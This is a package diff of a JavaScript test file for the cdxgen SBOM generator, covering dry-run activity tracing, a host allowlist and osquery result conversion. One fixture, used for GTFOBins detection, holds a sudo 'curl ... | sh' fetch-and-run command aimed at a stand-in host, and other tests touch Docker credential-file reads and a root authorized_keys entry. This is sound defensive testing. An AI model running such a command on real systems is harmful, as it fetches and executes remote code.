@cyclonedx/cdxgen 12.3.3 → 12.4.0

package/lib/helpers/utils.poku.js

@@ -10,7 +10,7 @@ import {
   unlinkSync,
   writeFileSync,
 } from "node:fs";
-import { tmpdir } from "node:os";
+import { platform, tmpdir } from "node:os";
 import path from "node:path";
 import process from "node:process";
 
@@ -23,17 +23,23 @@ import { parse as loadYaml } from "yaml";
 
 import { validateRefs } from "../validator/bomValidator.js";
 import {
+  addEvidenceForDotnet,
+  addEvidenceForImports,
   attachIdentityTools,
   buildObjectForCocoaPod,
   buildObjectForGradleModule,
+  cdxgenAgent,
   collectExecutables,
+  collectSharedLibs,
   convertOSQueryResults,
   encodeForPurl,
   extractToolRefs,
   findLicenseId,
   findPnpmPackagePath,
+  getAllFiles,
   getCratesMetadata,
   getDartMetadata,
+  getDefaultBomAuditCategories,
   getLicenses,
   getMvnMetadata,
   getPropertyGroupTextNodes,
@@ -42,6 +48,7 @@ import {
   guessPypiMatchingVersion,
   hasAnyProjectType,
   inferJarGroupFromManifest,
+  isAllowedHttpHost,
   isDryRunError,
   isPackageManagerAllowed,
   isPartialTree,
@@ -133,14 +140,19 @@ import {
   parseYarnLock,
   pnpmMetadata,
   purlFromUrlString,
+  readEnvironmentVariable,
   readZipEntry,
+  recordSensitiveFileRead,
+  recordSymlinkResolution,
   resetRecordedActivities,
+  safeExistsSync,
   safeMkdtempSync,
   safeRmSync,
   safeSpawnSync,
   safeUnlinkSync,
   safeWriteSync,
   setDryRunMode,
+  shouldRunPredictiveBomAudit,
   splitOutputByGradleProjects,
   toGemModuleNames,
   trimJarGroupSuffix,
@@ -149,6 +161,23 @@ import {
 
 const jarMetadataFixturesDir = path.resolve("test", "data", "jar-metadata");
 
+function createMockedProcess(envOverrides = {}) {
+  const env = {
+    ...process.env,
+  };
+  for (const [key, value] of Object.entries(envOverrides)) {
+    if (value === undefined) {
+      delete env[key];
+    } else {
+      env[key] = value;
+    }
+  }
+  const mockedProcess = Object.create(process);
+  mockedProcess.argv = [...process.argv];
+  mockedProcess.env = env;
+  return mockedProcess;
+}
+
 function readJarMetadataFixture(...segments) {
   return readFileSync(path.join(jarMetadataFixturesDir, ...segments), {
     encoding: "utf-8",
@@ -281,15 +310,320 @@ it("safeSpawnSync() returns a dry-run sentinel result when dry run mode is enabl
     const result = safeSpawnSync("node", ["--version"], {});
     assert.strictEqual(result.status, 1);
     assert.ok(isDryRunError(result.error));
-    const activities = getRecordedActivities();
-    assert.strictEqual(activities[0].kind, "execute");
-    assert.strictEqual(activities[0].status, "blocked");
+    const executeActivity = getRecordedActivities().find(
+      (activity) => activity.kind === "execute",
+    );
+    assert.ok(executeActivity);
+    assert.strictEqual(executeActivity.status, "blocked");
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() does not classify non-probe -v commands as version checks", () => {
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    safeSpawnSync("swift", ["package", "-v", "resolve"], {});
+    const executeActivity = getRecordedActivities().find(
+      (activity) => activity.kind === "execute",
+    );
+    assert.ok(executeActivity);
+    assert.strictEqual(executeActivity.probeType, undefined);
+    assert.ok(!/version check/i.test(executeActivity.reason));
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() reads CDXGEN_ALLOWED_COMMANDS once per invocation", () => {
+  const originalAllowedCommands = process.env.CDXGEN_ALLOWED_COMMANDS;
+  process.env.CDXGEN_ALLOWED_COMMANDS = "echo-cdxgen-test";
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    safeSpawnSync("echo-cdxgen-test", ["value"], {});
+    const envActivities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_ALLOWED_COMMANDS",
+    );
+    assert.strictEqual(envActivities.length, 1);
+    assert.strictEqual(envActivities[0].count, 1);
+  } finally {
+    if (originalAllowedCommands === undefined) {
+      delete process.env.CDXGEN_ALLOWED_COMMANDS;
+    } else {
+      process.env.CDXGEN_ALLOWED_COMMANDS = originalAllowedCommands;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("safeSpawnSync() records stdout and stderr byte sizes in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: "echo-cdxgen-test",
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:child_process": {
+      spawnSync: sinon.stub().returns({
+        status: 0,
+        stdout: "hello",
+        stderr: "warn",
+      }),
+    },
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  utilsModule.resetRecordedActivities();
+  utilsModule.safeSpawnSync("echo-cdxgen-test", ["value"], {});
+  const executeActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "execute" &&
+        activity.target === "echo-cdxgen-test value",
+    );
+  assert.ok(executeActivity);
+  assert.strictEqual(executeActivity.stdoutBytes, 5);
+  assert.strictEqual(executeActivity.stderrBytes, 4);
+  utilsModule.resetRecordedActivities();
+});
+
+it("safeExtractArchive() records source byte size in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: undefined,
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-archive-trace-"));
+  const sourcePath = path.join(tempDir, "archive.zip");
+  const targetPath = path.join(tempDir, "extracted");
+  mkdirSync(targetPath, { recursive: true });
+  writeFileSync(sourcePath, "abc");
+  utilsModule.resetRecordedActivities();
+  await utilsModule.safeExtractArchive(
+    sourcePath,
+    targetPath,
+    async () => {
+      writeFileSync(path.join(targetPath, "a.txt"), "hello");
+      mkdirSync(path.join(targetPath, "nested"), { recursive: true });
+      writeFileSync(path.join(targetPath, "nested", "b.txt"), "xy");
+    },
+    "unzip",
+  );
+  const archiveActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "unzip" &&
+        activity.target === `${sourcePath} -> ${targetPath}`,
+    );
+  assert.ok(archiveActivity);
+  assert.strictEqual(archiveActivity.status, "completed");
+  assert.strictEqual(archiveActivity.sourceBytes, 3);
+  rmSync(tempDir, { recursive: true, force: true });
+});
+
+it("safeExtractArchive() records failed extraction activity in debug mode", async () => {
+  const mockedProcess = createMockedProcess({
+    CDXGEN_ALLOWED_COMMANDS: undefined,
+    CDXGEN_DEBUG_MODE: "debug",
+    CDXGEN_SECURE_MODE: undefined,
+    NODE_OPTIONS: undefined,
+  });
+  const utilsModule = await esmock("./utils.js", {
+    "node:process": {
+      default: mockedProcess,
+    },
+  });
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-archive-trace-"));
+  const sourcePath = path.join(tempDir, "archive.tar");
+  const targetPath = path.join(tempDir, "extracted");
+  mkdirSync(targetPath, { recursive: true });
+  writeFileSync(sourcePath, "abcd");
+  utilsModule.resetRecordedActivities();
+  const extractionError = new Error("permission denied");
+  extractionError.code = "EACCES";
+  await assert.rejects(
+    utilsModule.safeExtractArchive(
+      sourcePath,
+      targetPath,
+      async () => {
+        throw extractionError;
+      },
+      "untar",
+    ),
+    extractionError,
+  );
+  const archiveActivity = utilsModule
+    .getRecordedActivities()
+    .find(
+      (activity) =>
+        activity.kind === "untar" &&
+        activity.target === `${sourcePath} -> ${targetPath}`,
+    );
+  assert.ok(archiveActivity);
+  assert.strictEqual(archiveActivity.status, "failed");
+  assert.strictEqual(archiveActivity.errorCode, "EACCES");
+  assert.strictEqual(archiveActivity.sourceBytes, 4);
+  rmSync(tempDir, { recursive: true, force: true });
+});
+
+it("records dry-run environment variable reads via helper access", () => {
+  const originalEnvValue = process.env.CDXGEN_TEST_ENV_READ;
+  process.env.CDXGEN_TEST_ENV_READ = "trace-me";
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    readEnvironmentVariable("CDXGEN_TEST_ENV_READ");
+    readEnvironmentVariable("CDXGEN_TEST_ENV_READ");
+    const activities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_TEST_ENV_READ",
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "env");
+    assert.match(activities[0].reason, /2 times/);
+  } finally {
+    if (originalEnvValue === undefined) {
+      delete process.env.CDXGEN_TEST_ENV_READ;
+    } else {
+      process.env.CDXGEN_TEST_ENV_READ = originalEnvValue;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("isAllowedHttpHost() honors exact and wildcard host allowlists", () => {
+  const originalAllowedHosts = process.env.CDXGEN_ALLOWED_HOSTS;
+  try {
+    process.env.CDXGEN_ALLOWED_HOSTS = "example.com,*.trusted.test";
+    assert.strictEqual(isAllowedHttpHost("example.com"), true);
+    assert.strictEqual(isAllowedHttpHost("api.trusted.test"), true);
+    assert.strictEqual(isAllowedHttpHost("trusted.test"), false);
+    assert.strictEqual(isAllowedHttpHost("evil.com"), false);
+  } finally {
+    if (originalAllowedHosts === undefined) {
+      delete process.env.CDXGEN_ALLOWED_HOSTS;
+    } else {
+      process.env.CDXGEN_ALLOWED_HOSTS = originalAllowedHosts;
+    }
+  }
+});
+
+it("deduplicates sensitive file read activity entries in dry-run mode", () => {
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    recordSensitiveFileRead("/tmp/docker/config.json", {
+      label: "Docker credential file",
+    });
+    recordSensitiveFileRead("/tmp/docker/config.json", {
+      label: "Docker credential file",
+    });
+    const activities = getRecordedActivities().filter(
+      (activity) => activity.target === "/tmp/docker/config.json",
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "read");
+    assert.match(activities[0].reason, /2 times/);
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
+it("records classified manifest and config inspections in dry-run mode", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-inspect-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  const settingsXmlFile = path.join(tmpRoot, "settings.xml");
+  writeFileSync(packageJsonFile, "{}");
+  writeFileSync(settingsXmlFile, "<settings />");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    assert.ok(safeExistsSync(packageJsonFile));
+    assert.ok(safeExistsSync(settingsXmlFile));
+    const activities = getRecordedActivities().filter((activity) =>
+      [packageJsonFile, settingsXmlFile].includes(activity.target),
+    );
+    assert.strictEqual(activities.length, 2);
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.kind),
+      ["inspect", "inspect"],
+    );
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.classification),
+      ["manifest", "config"],
+    );
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
+  }
+});
+
+it("records recursive file discovery activity in dry-run mode", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-glob-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  writeFileSync(packageJsonFile, "{}");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    const files = getAllFiles(tmpRoot, "**/package.json");
+    assert.deepStrictEqual(files, [packageJsonFile]);
+    const activities = getRecordedActivities().filter((activity) =>
+      activity.target.includes("**/package.json"),
+    );
+    assert.strictEqual(activities.length, 1);
+    assert.strictEqual(activities[0].kind, "discover");
+    assert.strictEqual(activities[0].discoveryType, "manifest-discovery");
   } finally {
     setDryRunMode(false);
     resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
   }
 });
 
+it("records updated discovery activity when a repeated glob match count changes", () => {
+  const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-glob-"));
+  const packageJsonFile = path.join(tmpRoot, "package.json");
+  const nestedDir = path.join(tmpRoot, "nested");
+  const nestedPackageJsonFile = path.join(nestedDir, "package.json");
+  writeFileSync(packageJsonFile, "{}");
+  setDryRunMode(true);
+  resetRecordedActivities();
+  try {
+    getAllFiles(tmpRoot, "**/package.json");
+    mkdirSync(nestedDir, { recursive: true });
+    writeFileSync(nestedPackageJsonFile, "{}");
+    getAllFiles(tmpRoot, "**/package.json");
+    const activities = getRecordedActivities().filter((activity) =>
+      activity.target.includes("**/package.json"),
+    );
+    assert.strictEqual(activities.length, 2);
+    assert.deepStrictEqual(
+      activities.map((activity) => activity.matchedCount),
+      [1, 2],
+    );
+  } finally {
+    setDryRunMode(false);
+    resetRecordedActivities();
+    rmSync(tmpRoot, { force: true, recursive: true });
+  }
+});
 it("dry-run filesystem wrappers do not mutate the filesystem", () => {
   const tmpRoot = mkdtempSync(path.join(tmpdir(), "cdxgen-dry-run-"));
   const fileToKeep = path.join(tmpRoot, "keep.txt");
@@ -445,6 +779,37 @@ it("cdxgenAgent records completed and failed network activity outcomes", async (
   }
 });
 
+it("cdxgenAgent reads CDXGEN_ALLOWED_HOSTS once per request", () => {
+  const originalAllowedHosts = process.env.CDXGEN_ALLOWED_HOSTS;
+  try {
+    process.env.CDXGEN_ALLOWED_HOSTS = "example.com";
+    const beforeRequestHook =
+      cdxgenAgent.defaults.options.hooks.beforeRequest[0];
+
+    setDryRunMode(true);
+    resetRecordedActivities();
+    assert.throws(() =>
+      beforeRequestHook({
+        context: {},
+        url: new URL("https://example.com/resource"),
+      }),
+    );
+    const envActivities = getRecordedActivities().filter(
+      (activity) => activity.target === "process.env:CDXGEN_ALLOWED_HOSTS",
+    );
+    assert.strictEqual(envActivities.length, 1);
+    assert.strictEqual(envActivities[0].count, 1);
+  } finally {
+    if (originalAllowedHosts === undefined) {
+      delete process.env.CDXGEN_ALLOWED_HOSTS;
+    } else {
+      process.env.CDXGEN_ALLOWED_HOSTS = originalAllowedHosts;
+    }
+    setDryRunMode(false);
+    resetRecordedActivities();
+  }
+});
+
 it("safeSpawnSync() logs container python notices to stdout", () => {
   const originalConsoleLog = console.log;
   const originalConsoleWarn = console.warn;
@@ -3924,6 +4289,44 @@ it("parse project.assets.json", () => {
   */
 });
 
+it("addEvidenceForDotnet() initializes evidence before adding occurrences", () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-dotnet-evidence-"));
+  const slicesFile = path.join(tempDir, "dosai.json");
+  try {
+    writeFileSync(
+      slicesFile,
+      JSON.stringify({
+        Dependencies: [
+          {
+            Module: "Example.dll",
+            Path: "src/Program.cs",
+            LineNumber: 42,
+          },
+        ],
+      }),
+    );
+    const pkgList = addEvidenceForDotnet(
+      [
+        {
+          name: "Example",
+          purl: "pkg:nuget/Example@1.0.0",
+          properties: [{ name: "PackageFiles", value: "Example.dll" }],
+        },
+      ],
+      slicesFile,
+    );
+    assert.deepStrictEqual(pkgList[0].evidence?.occurrences, [
+      {
+        location: "src/Program.cs",
+        line: 42,
+      },
+    ]);
+    assert.strictEqual(pkgList[0].scope, "required");
+  } finally {
+    rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
 it("parse packages.lock.json", () => {
   assert.deepStrictEqual(parseCsPkgLockData(null), {
     dependenciesList: [],
@@ -10084,6 +10487,85 @@ it("hasAnyProjectType tests", () => {
   );
 });
 
+it("shouldRunPredictiveBomAudit tests", () => {
+  assert.strictEqual(shouldRunPredictiveBomAudit({}, "cdxgen"), true);
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["linux"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os", "darwin"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["os", "js"] }, "cdxgen"),
+    true,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: "os,linux" }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["hbom"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["hardware"] }, "cdxgen"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["js"] }, "obom"),
+    false,
+  );
+  assert.strictEqual(
+    shouldRunPredictiveBomAudit({ projectType: ["js"] }, "hbom"),
+    false,
+  );
+});
+
+it("getDefaultBomAuditCategories tests", () => {
+  assert.strictEqual(getDefaultBomAuditCategories({}, "cdxgen"), undefined);
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["os"] }, "cdxgen"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["linux"] }, "cdxgen"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["os", "js"] }, "cdxgen"),
+    undefined,
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["hbom"] }, "cdxgen"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["hardware"] }, "cdxgen"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories(
+      { includeRuntime: true, projectType: ["hbom"] },
+      "cdxgen",
+    ),
+    "hbom-security,hbom-performance,hbom-compliance,host-topology",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["js"] }, "obom"),
+    "obom-runtime",
+  );
+  assert.strictEqual(
+    getDefaultBomAuditCategories({ projectType: ["js"] }, "hbom"),
+    "hbom-security,hbom-performance,hbom-compliance",
+  );
+});
+
 it("isPackageManagerAllowed tests", () => {
   assert.deepStrictEqual(
     isPackageManagerAllowed("uv", ["pip", "poetry", "hatch", "pdm"], {
@@ -10646,6 +11128,152 @@ it("parses valid minified js with real package name (#2717)", async () => {
 });
 
 describe("convertOSQueryResults", () => {
+  it("includes the osquery 5.23.0 query pack additions across platform profiles", () => {
+    const linuxQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+    const darwinQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries-darwin.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+    const windowsQueries = JSON.parse(
+      readFileSync(
+        new URL("../../data/queries-win.json", import.meta.url),
+        "utf-8",
+      ),
+    );
+
+    assert.ok(linuxQueries.npm_packages);
+    assert.ok(linuxQueries.secureboot_certificates);
+    assert.ok(linuxQueries.apt_ppa_sources);
+    assert.ok(linuxQueries.sysctl_hardening);
+    assert.ok(linuxQueries.mount_hardening);
+    assert.ok(linuxQueries.trusted_gpg_keys);
+    assert.ok(darwinQueries.gatekeeper);
+    assert.ok(darwinQueries.npm_packages);
+    assert.match(
+      darwinQueries.package_bom.query,
+      /WHERE path IN \(SELECT REPLACE\(package_receipts\.path, '.plist', '.bom'\) FROM package_receipts JOIN file ON file\.path = REPLACE\(package_receipts\.path, '.plist', '.bom'\) WHERE package_receipts\.path LIKE '%.plist' AND file\.size <= 52428800\)/i,
+    );
+    assert.match(linuxQueries.trusted_gpg_keys.query, /file\.directory/);
+    assert.match(linuxQueries.trusted_gpg_keys.query, /hash\.sha256/);
+    assert.ok(windowsQueries.process_open_handles_snapshot);
+  });
+
+  it("should model trusted linux repository keys as cryptographic assets", () => {
+    const components = convertOSQueryResults(
+      "trusted_gpg_keys",
+      {
+        purlType: "generic",
+        componentType: "cryptographic-asset",
+      },
+      [
+        {
+          name: "debian-archive-keyring.gpg",
+          version: "c".repeat(64),
+          description: "/usr/share/keyrings/debian-archive-keyring.gpg",
+          path: "/usr/share/keyrings/debian-archive-keyring.gpg",
+          sha1: "b".repeat(40),
+          sha256: "c".repeat(64),
+          trust_domain: "apt",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].type, "cryptographic-asset");
+    assert.strictEqual(components[0].purl, undefined);
+    assert.ok(
+      components[0]["bom-ref"].startsWith(
+        "crypto/related-crypto-material/public-key/",
+      ),
+    );
+    assert.strictEqual(
+      components[0].cryptoProperties?.assetType,
+      "related-crypto-material",
+    );
+    assert.strictEqual(
+      components[0].cryptoProperties?.relatedCryptoMaterialProperties?.type,
+      "public-key",
+    );
+    assert.ok(
+      components[0].hashes.some(
+        (hash) => hash.alg === "SHA-256" && hash.content === "c".repeat(64),
+      ),
+    );
+  });
+
+  it("should preserve the full certificate crypto properties shape", () => {
+    const components = convertOSQueryResults(
+      "certificates",
+      {
+        purlType: "generic",
+        componentType: "cryptographic-asset",
+      },
+      [
+        {
+          name: "ACCVRAIZ1",
+          path: "/etc/ssl/certs/ACCVRAIZ1.crt",
+          serial: "5EC3B7A6437FA4E0",
+          subject: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+          issuer: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+          not_valid_before: "2011-05-05T09:37:37.000Z",
+          not_valid_after: "2030-12-31T09:37:37.000Z",
+          sha1: "1".repeat(40),
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].type, "cryptographic-asset");
+    assert.strictEqual(
+      components[0].cryptoProperties?.assetType,
+      "certificate",
+    );
+    assert.deepStrictEqual(
+      components[0].cryptoProperties?.certificateProperties,
+      {
+        serialNumber: "5EC3B7A6437FA4E0",
+        subjectName: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+        issuerName: "/CN=ACCVRAIZ1/OU=PKIACCV/O=ACCV/C=ES",
+        notValidBefore: "2011-05-05T09:37:37.000Z",
+        notValidAfter: "2030-12-31T09:37:37.000Z",
+        certificateFormat: "X.509",
+        certificateFileExtension: "crt",
+        fingerprint: { alg: "SHA-1", content: "1".repeat(40) },
+      },
+    );
+  });
+
+  it("should ignore empty occurrence locations when adding import evidence", async () => {
+    const pkgList = [{ name: "lodash" }];
+    const allImports = {
+      lodash: [
+        {
+          fileName: "   ",
+          importedAs: "lodash",
+          importedModules: ["map"],
+        },
+      ],
+    };
+
+    await addEvidenceForImports(pkgList, allImports, {}, false);
+
+    assert.strictEqual(pkgList[0].scope, "required");
+    assert.strictEqual(pkgList[0].evidence, undefined);
+    assert.deepStrictEqual(pkgList[0].properties, [
+      {
+        name: "ImportedModules",
+        value: "lodash,lodash/map",
+      },
+    ]);
+  });
+
   it("should use identifier as package name for chrome-extension purl type", () => {
     const components = convertOSQueryResults(
       "chrome_extensions",
@@ -10674,6 +11302,32 @@ describe("convertOSQueryResults", () => {
     assert.ok(propNames.includes("identifier"));
   });
 
+  it("should omit purl for osquery data components while keeping a stable bom-ref", () => {
+    const components = convertOSQueryResults(
+      "authorized_keys_snapshot",
+      {
+        purlType: "swid",
+        componentType: "data",
+      },
+      [
+        {
+          name: "root",
+          version: "ssh-ed25519",
+          description: "ops@example.invalid",
+          key_file: "/root/.ssh/authorized_keys",
+          uid: "0",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].purl, undefined);
+    assert.strictEqual(
+      components[0]["bom-ref"],
+      "osquery:authorized_keys_snapshot:data:root@ssh-ed25519[key_file=/root/.ssh/authorized_keys]",
+    );
+  });
+
   it("should add LOLBAS properties to suspicious windows osquery rows", () => {
     const components = convertOSQueryResults(
       "windows_run_keys",
@@ -10691,6 +11345,11 @@ describe("convertOSQueryResults", () => {
       false,
     );
     assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].purl, undefined);
+    assert.strictEqual(
+      components[0]["bom-ref"],
+      "osquery:windows_run_keys:data:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater@unknown",
+    );
     const propertyMap = Object.fromEntries(
       components[0].properties.map((property) => [
         property.name,
@@ -10704,6 +11363,42 @@ describe("convertOSQueryResults", () => {
     assert.ok(propertyMap["cdx:lolbas:attackTechniques"].includes("T1059.001"));
   });
 
+  it("should add GTFOBins properties to suspicious Linux osquery rows", () => {
+    if (platform() !== "linux") {
+      return;
+    }
+    const components = convertOSQueryResults(
+      "sudo_executions",
+      {
+        purlType: "swid",
+        componentType: "application",
+      },
+      [
+        {
+          name: "bash",
+          path: "/usr/bin/bash",
+          cmdline: "bash -c 'curl https://example.invalid/p.sh | sh'",
+          parent_cmdline: "sudo bash -c payload",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.ok(components[0].purl?.startsWith("pkg:swid/bash"));
+    const propertyMap = Object.fromEntries(
+      components[0].properties.map((property) => [
+        property.name,
+        property.value,
+      ]),
+    );
+    assert.strictEqual(propertyMap["cdx:gtfobins:matched"], "true");
+    assert.ok(propertyMap["cdx:gtfobins:names"].includes("bash"));
+    assert.ok(propertyMap["cdx:gtfobins:functions"].includes("shell"));
+    assert.ok(
+      propertyMap["cdx:gtfobins:queryCategory"].includes("sudo_executions"),
+    );
+  });
+
   it("collectExecutables() prefers usr-merged executable paths", () => {
     if (process.platform === "win32") {
       return;
@@ -10737,4 +11432,151 @@ describe("convertOSQueryResults", () => {
       rmSync(tempDir, { recursive: true, force: true });
     }
   });
+
+  it("collectExecutables() resolves followed symlink targets in dry-run mode", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-executables-"));
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      mkdirSync(path.join(tempDir, "usr", "bin"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "bin", "which"), "#!/bin/sh\n");
+      chmodSync(path.join(tempDir, "usr", "bin", "which"), 0o755);
+      symlinkSync(path.join(tempDir, "usr", "bin"), path.join(tempDir, "bin"));
+
+      const result = collectExecutables(tempDir, ["/bin"]);
+
+      assert.deepStrictEqual(result, ["usr/bin/which"]);
+      const symlinkActivities = getRecordedActivities().filter(
+        (activity) => activity.kind === "symlink-resolution",
+      );
+      for (const symlinkActivity of symlinkActivities) {
+        assert.strictEqual(symlinkActivity.traceDetail, undefined);
+      }
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectExecutables() skips files already owned by OS packages", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-executables-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "bin"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "bin", "owned"), "#!/bin/sh\n");
+      writeFileSync(path.join(tempDir, "usr", "bin", "unowned"), "#!/bin/sh\n");
+      chmodSync(path.join(tempDir, "usr", "bin", "owned"), 0o755);
+      chmodSync(path.join(tempDir, "usr", "bin", "unowned"), 0o755);
+
+      const result = collectExecutables(
+        tempDir,
+        ["/usr/bin"],
+        ["/usr/bin/owned"],
+      );
+
+      assert.deepStrictEqual(result, ["usr/bin/unowned"]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectSharedLibs() preserves symlink alias entries while tracing resolutions", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-shared-libs-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "lib"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "lib", "libfoo.so.1"), "binary");
+      symlinkSync(
+        path.join(tempDir, "usr", "lib", "libfoo.so.1"),
+        path.join(tempDir, "usr", "lib", "libfoo.so"),
+      );
+
+      const result = collectSharedLibs(tempDir, ["/usr/lib"]);
+
+      assert.deepStrictEqual(result, [
+        "usr/lib/libfoo.so",
+        "usr/lib/libfoo.so.1",
+      ]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectSharedLibs() skips libraries already owned by OS packages", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-shared-libs-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "lib"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "lib", "libowned.so.1"), "owned");
+      writeFileSync(
+        path.join(tempDir, "usr", "lib", "libunowned.so.1"),
+        "unowned",
+      );
+
+      const result = collectSharedLibs(
+        tempDir,
+        ["/usr/lib"],
+        undefined,
+        undefined,
+        ["/usr/lib/libowned.so.1"],
+      );
+
+      assert.deepStrictEqual(result, ["usr/lib/libunowned.so.1"]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("recordSymlinkResolution() normalizes mixed path separators before comparing paths", () => {
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      const activity = recordSymlinkResolution(
+        "usr\\bin\\which",
+        "usr/bin/which",
+      );
+      assert.strictEqual(activity, undefined);
+      assert.deepStrictEqual(getRecordedActivities(), []);
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
+    }
+  });
+
+  it("recordSymlinkResolution() normalizes failed resolution paths without exposing trace detail", () => {
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      recordSymlinkResolution("/tmp/root/usr/lib/libfoo.so", undefined, {
+        basePath: "/tmp/root",
+        errorCode: "ENOENT",
+        metadata: {
+          resolutionKind: "shared-library",
+        },
+        status: "failed",
+      });
